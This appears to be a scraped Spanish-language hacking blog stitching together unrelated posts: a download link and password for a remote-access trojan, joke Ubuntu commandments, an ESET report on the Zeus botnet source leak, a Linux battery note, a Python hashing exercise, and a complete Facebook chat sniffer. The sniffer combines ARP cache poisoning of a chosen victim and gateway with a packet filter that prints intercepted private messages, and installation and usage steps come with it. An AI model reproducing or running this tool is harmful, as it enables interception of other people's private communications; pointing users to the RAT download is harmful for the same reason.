- Se ha añadido la opción de servidor de desconexión.

Descarga: http://sites.google.com/site/nxtremerat/
Contraseña: 123
1. Amaras el terminal sobre todas las cosas
2. No tomaras la Guia-Ubuntu en vano
3. Santificaras las LTS
4. Honraras a Gnome y Kde por igual
5. No reinstalaras Ubuntu hasta agotar todas las posibilidades
6. No usaras Windows salvo por fuerza mayor
7. Compartirás tu conocimiento con los demás Ubunteros
8. No dirás que Ubuntu es perfecto
9. No pensaras en volver a Windows
10. No codiciaras los Mac’s ajenos
11. No te estancaras en ubuntu probaras otras distros (no solo de ubuntu vive linux)

12. No iniciarás como root.
Usa “sudo” o “su -” para las tareas de administración del sistema.

13. Usarás el gestor de paquetes todo lo posible.
Algunas veces instalar desde las fuentes no se puede evitar, pero cuando uses el gestor de paquetería de tu distro para instalar software, también podrás usarlo para actualizarlo y quitarlo. Esta es una de las fortalezas de Linux.

14. Serás parte de una comunidad.
Libremente da lo que has recibido gratuitamente. Ofrece ayuda y consejo en todo lo que puedas.

15. Leerás la documentación y manuales.
Siempre lee la documentación. La gente que escribe el software intenta anticiparse a tus preguntas, y proporcionar respuestas antes que preguntes.

16. Usarás el sistema de soporte.
Cambiarse a Linux puede ser difícil. Puede ser frustrante, pero hay gente que puede y quiere ayudarte. Déjalos hacer su trabajo.

17. Buscarás.
En la mayoría de los casos, tus preguntas y problemas han sido respondidos. Intenta buscar las respuestas que han sido resueltas antes de preguntar a alguien.

18. Explorarás.
Linux te abre un nuevo mundo de opciones y posibilidades. Intenta todo lo que puedas.

19. Usarás la línea de comandos.
Especialmente para configuraciones, usa las interfases gráficas para que tu sistema funcione a la perfección, pero intenta conocer la versión en línea de comandos también. En algunos casos, la línea de comandos es la única forma de usar alguna de las tantas características avanzadas de Linux.

20. No intentarás recrear Windows.
Linux no intenta ser un clon de Windows. Es diferente. Acepta y aprecia las diferencias.

21. No te darás por vencido.
Intenta con diferentes distribuciones hasta encontrar la que más te guste. Instala distros de vez en cuando. Intenta con diferentes programas que sirvan para un sólo propósito antes de establecerse (amarok, xmms, beep, exaile para música; azureus, ktorrent, deluge para bittorrents). Si ni te gustan los programas “de fábrica”, recuerda que casi siempre puedes cambiar a lo que más se te acomode.

!!! AMEN !!!


Mucho se ha escuchado hablar sobre la liberación del código fuente de Zeus, la botnet cuyo principal objetivo es el robo de información bancaria. Hasta ahora habíamos explicado cómo comenzaban a aparecer pequeñas variantes de esta botnet permitiéndonos estimar su futuro crecimiento, pero hoy podemos dar crédito a esas predicciones y demostrar con datos reales la veracidad de los mismos.

A mediados del pasado mes de mayo, ocurrió algo que de lo que se venía hablando desde hacía ya un tiempo, pero que hasta ese momento solo habían sido rumores, la liberación real del código de Zeus. Este hecho, esperado por algunos, abrió una nueva etapa en lo que respecta a este malware. Dicha liberación de código permitió a los investigadores corroborar los trabajos de análisis realizados sobre éste código malicioso y conocer en detalle ciertos aspectos que por su complejidad no eran tan difundidos.
La disponibilidad del código benefició a los investigadores, como mencionamos anteriormente, pero lamentablemente también trajo beneficios para los creadores de malware, los cuales con el código a su disposición, le dieron vida nuevamente a esta amenaza.

Con el código liberado, se esperaba el crecimiento de variantes de este malware, cosa que desde el Laboratorio de Análisis e Investigación de ESET Latinoamérica podemos corroborar al analizar las muestras que llegan diariamente

Como vemos en el gráfico que se muestra a continuación, el crecimiento de la cantidad de muestras detectadas pertenecientes a la familia de Zeus es notable. En el mes de abril, donde todavía no se había producido la filtración del código fuente de Zeus, la cantidad de muestras de Zbot (nombre de detección de las muestras de Zeus) fue de solo un 1% del total de muestras recibidas. Ya en el mes de Mayo, mes en el cual el código estuvo disponible para ser descargado, se evidenció un crecimiento importante de la cantidad de muestras detectadas, un 13% del total. En lo que va de Junio, teniendo en cuenta los datos hasta mitad de mes, el crecimiento sigue en ascenso, llevándolo a un 22% del total. Para finales de mes, de seguir con esta proyección, veremos un porcentaje mucho más alto de detecciones que el mes anterior.

Como podemos apreciar, el porcentaje de crecimiento de esta amenaza aumento notablemente desde la aparición de su código fuente. Hechos como este potencian el crecimiento del malware, ya que, disponiendo del código fuente, cualquier persona puede crear sus propias variantes de códigos maliciosos.

Fuente: Laboratorios ESET
Las últimas versiones de la distribución de Canonical han traído muchas novedades y mejoras, pero tampoco se han librado de incluir algunos problemas. El más grave de todos, con mucho, es el que afecta a la autonomía de las baterías en los portátiles, y que hace que Ubuntu 10.10 y Ubuntu 11.04 pierdan muchos enteros en estos equipos.

a lo comentaba Metalbyte hace mes y medio al hablar del kernel Linux 2.6.38, que es el causante de una situación que por ahora sigue sin solucionarse: el núcleo de Linux ha ganado terreno en muchos apartados, pero desde luego hay un problemón con la gestión de energía.

En Phoronix ya habían avisado de este tema, que también ha sido tratado en UbuntuForums, en el foro de Fedora, en la herramienta de errores de Ubuntu y seguro que en muchos otros sitios, y el tema ha vuelto a ponerse de manifiesto tras un análisis de Ubuntu 11.04 que ha aparecido en Tom’s Hardware y que precisamente hace hincapié en el tema:

En lo que respecta al rendimiento, hay razones de peso para que ciertos usuarios se actualicen [a Ubuntu 11.04]. También hay razones de peso para que algunos usuarios eviten esta distribución por todos los medios. Los jugones de Linux podrán disfrutar de mejoras sustanciales, mientras que los usuarios móviles sufrirán una pérdida de autonomía de la batería dramática.
Los argumentos no se lanzan a la ligera: las pruebas realizadas por Tom’s Hardware vuelven a reforzar lo que se había descubierto en el pasado, y lo peor es que la solución aún no se ha producido.


Así, en el kernel 2.6.39 la cosa mejora ligeramente, y parece que también se ha evolucionado un poco en los recién anunciados kernels 3.0, pero en realidad el problema persiste y sigue siendo muy grave para los usuarios de portátiles, que será mejor que utilicen distribuciones que no pasen del kernel 2.6.37.

Fuente - http://www.muylinux.com


Espero les sirva
By Xpl0_syst3m
Bien, hoy estaba estudiando algo sobre POO (Programación Orientada a Objetos) y bueno continuando con mi codigo de "Encriptadores de hash" el dia de hoy hice un codigo del mismo pero a diferencia de el otro código es que en este nuevo code use un clase...
Solo para practicar... Si alguien al igual que yo esta estudiando python, pues les dejo este ejemplo:

#!/bin/python
# -*- coding:UTF-8 -*-
import sys, base64, hashlib, hmac
from string import maketrans

#Codificacion con maketrans
ZtuX=maketrans("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789","mab1c2z3k4h5f6s7p8i9y0rewqQW]RT[UI$%A(D-G)JK Z#CVB/M@&\*.;_^{}")
#Decodificación con makeTrans
Ztux=maketrans("mab1c2z3k4h5f6s7p8i9y0rewqQW]RT[UI$%A(D-G)JK Z#CVB/M@&\*.;_^{}","abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")

class palabra:
def __init__(self,string):
self.string = string
print 'Has introducido la palabra: ', string
def md5(self):
print 'MD5>>> ' ,hashlib.md5(a).hexdigest()
def code_base64(self):
print 'Base64>>> ',base64.b64encode(a)
def decode_base64(self):
print base64.b64decode(a)
def ztux(self):
print 'ZtuX>>> ',a.translate(ZtuX)
def dztux(self):
print 'Decodificado ZtuX>>> ',a.translate(Ztux)
def sha1(self):
print 'sha>>> ',hashlib.sha1(a).hexdigest()
def sha256(self):
print 'sha256>>> ',hashlib.sha256(a).hexdigest()
def sha384(self):
print 'sha384>>> ',hashlib.sha384(a).hexdigest()
def sha512(self):
print 'sha512>>> ',hashlib.sha512(a).hexdigest()
def Hmac(self):
print 'hmac>>> ',hmac.new(a).hexdigest()

a=raw_input('Palabra: ')
txt=palabra(a)
print '''
Convertir a:
[1] md5
[2] Base64
[3] Dec. Base64
[4] ZtuX
[5] Dec. ZtuX
[6] sha
[7] sha256
[8] sha384
[9] sha512
[10] hmac
'''
opc = input('Que deseas hacer[?]\n>>> ')
if opc == 1:
txt.md5()
if opc == 2:
txt.code_base64()
if opc == 3:
txt.decode_base64()
if opc == 4:
txt.ztux()
if opc == 5:
txt.dztux()
if opc == 6:
txt.sha1()
if opc == 7:
txt.sha256()
if opc == 8:
txt.sha384()
if opc == 9:
txt.sha512()
if opc == 10:
txt.Hmac()
else:
exit()

Hola amigos...
Pues no tengo nada mas que decir mas que gracias por sus visitas :D
Ahora estare trabajando con el Libro #2 de Python, quisiera saber si tienen alguna sugerencia o Comentario

Sin mas que decir me despido y de nuevo GRACIAS por sus visitas...



Salud[OS]
Nota: La mascara me la puse porque ME GUSTA, no por "presumir" que soy un Anonymous [ya que no lo soy ],si no porque me gusta la Pelicula "V de Vendetta" y la mascara esta genial :D , lo digo porque muchos asi lo pueden llegar a interpretar...
Hola amigos...Hoy les dejo esta herramienta, que lo que hace es espiar conversaciones de Facebook... En concreto esta tool es un sniffer...
El código esta escrito en Python, y bueno para usarlo necesitan tener instalado lo siguiente:

Python 2.x
arpspoof (dsniff suite)
dpkt
pypcap

Para instalar dichas herramientas en Ubuntu lo pueden hacer con el siguiente comando:


sudo apt-get install python-dpkt python-pypcap dsniff

Una vez instalado esta, podrán usar dicha herramienta!!
Este es el source de la tool, AQUI:


#!/usr/bin/env python
#-*-encoding:utf8-*-

""" 2011 vdo.pure at gmail.com"""

''' Traducido por ZtuX... secret.user8[at]gmail[dot].com'''

"""

Este programa es software libre: Usted puede redistribuirlo y / o modificar
bajo los términos de la licencia GNU General Public License publicada por
la Free Software Foundation, bien de la versión 3 de la Licencia, o
(a su elección) cualquier versión posterior.

Este programa se distribuye con la esperanza de que sea útil,
pero SIN NINGUNA GARANTÍA, incluso sin la garantía implícita de
COMERCIALIZACIÓN o IDONEIDAD PARA UN PROPÓSITO PARTICULAR. Consulte la
Licencia Pública General GNU para más detalles.

Usted debería haber recibido una copia de la Licencia Pública General GNU
junto con este programa. Si no, vaya a http://www.gnu.org/licenses/>.
"""
import sys, os
import dpkt, pcap

def check_root():
""" Devuelve Verdadero (True) si el usuario es root, de lo contrario Falso (False) """
if os.getenv('LOGNAME','none').lower() == 'root':
return True
return False

def poison(iface,victim, gw):
""" IP Forwarding """
os.system("sysctl -w .net.ipv4.ip_forward=1 > /dev/null")
""" ARP cache poisoning, silent, in both directions """
os.system("arpspoof -i "+iface+" -t "+victim+" "+gw+" 2> /dev/null &")
os.system("arpspoof -i "+iface+" -t "+gw+" "+victim+" 2> /dev/null &")
print("Envenenamiento de Cache ARP...")


def fbchatgrep(p,pid):
data = str(p.data)
if ("{\"t\":\"msg") and ("\"type\":\"msg\"") in data:
msgid=data[data.find("\"msgID\":")+9:data.rfind("\"},\"from\":")]
if (pid != msgid ): #Comprobar si el mensaje apareció antes (ARP poison clones)
pid = msgid
print(" ")
s = "Mensaje de: "+data[data.find("from_name\":\"")+12:data.rfind("\",\"from_first_name")]
print(unicode(s,'unicode_escape').encode('utf-8'))
s = "Para: "+data[data.find("to_name\":\"")+10:data.rfind("\",\"to_first_name")]
print(unicode(s,'unicode_escape').encode('utf-8'))
s = data[data.find("\"text\":")+8:data.rfind(",\"time\"")-1]
print(unicode(s,'unicode_escape').encode('utf-8'))
print(" ")
return pid

if __name__ == '__main__':
if len(sys.argv) < 4:
print '''Traducido por ZtuX... Visita http://mundohacking.com
Para usar siga esta Sintaxis: ./sniff.py [interfaz] [victima] [gateway]
Ejemplo: ./sniff.py eth0 192.168.1.2 192.168.1.254'''
sys.exit(0)
if not check_root():
print 'Debes ser SuperUsuario'
sys.exit(1)

pid="fo bar"
pc = pcap.pcap(sys.argv[1])
pc.setfilter('tcp and port 80') #Sniff only http

try:
print 'Escuchando en: %s' % (pc.name)
print 'Para Salir teclea: Control+C'
poison(sys.argv[1],sys.argv[2],sys.argv[3])
for ts, pkt in pc:
packet = dpkt.ethernet.Ethernet(pkt)
pid = fbchatgrep(packet,pid)

except KeyboardInterrupt:
os.system("sysctl -w .net.ipv4.ip_forward=0 > /dev/null") # Deshabilitar IP Delantera
nrecv, ndrop, nifdrop = pc.stats()
print '\n%d packets received by filter' % nrecv
print '%d packets dropped by kernel' % ndrop




Y bueno, ahora ¿Como usarlo?

Bien primero copiamos nuestro código en un Editor de Textos como Gedit [por ejemplo] y lo guardamos con la extension .py[IMPORTANTE LA EXTENSION .PY], con el nombre sniff... Preferentemente guardarlo en el Escritorio, y nos quedara como sniff.py
Despues tendremos que darle permisos de Ejecucion y lo hacemos de la sig. manera:
Abrimos una Terminal y nos vamos al lugar donde guardamos nuestro archivo... y tecleamos:

chmod +x sniff.py



Como podran notar, en la imagen el nombre del archivo cambio de color, esto porque ahora tiene permisos de ejecucion...
Y bien para hacerlo funcionar, solo basta escribir en una terminal:

./sniff.py
Y nos devuelve algo como:





/sniff.py 
Traducido por ZtuX... Visita http://mundohacking.com
Para usar siga esta Sintaxis: ./sniff.py [interfaz] [victima] [gateway]
Ejemplo: sniff.py eth0 192.168.1.2 192.168.1.254


Y para usarlo ahi tienen la sintaxis y un ejemplo...

Si asi es YO lo traducí jaja xD LOL!!Bueno eso es todo, alguna duda??

SaludOS
Por cierto se me olvidaba la página oficial de donde obtuve el source esta Aqui
Y ¿Como evitar este ataque?
Simple, ahora Facebook nos permite cifrar nuesta navegacion, para ello hay que ir a las opciones de nuestra cuenta y elegir la navegacion a travez de https

by [Z]TuX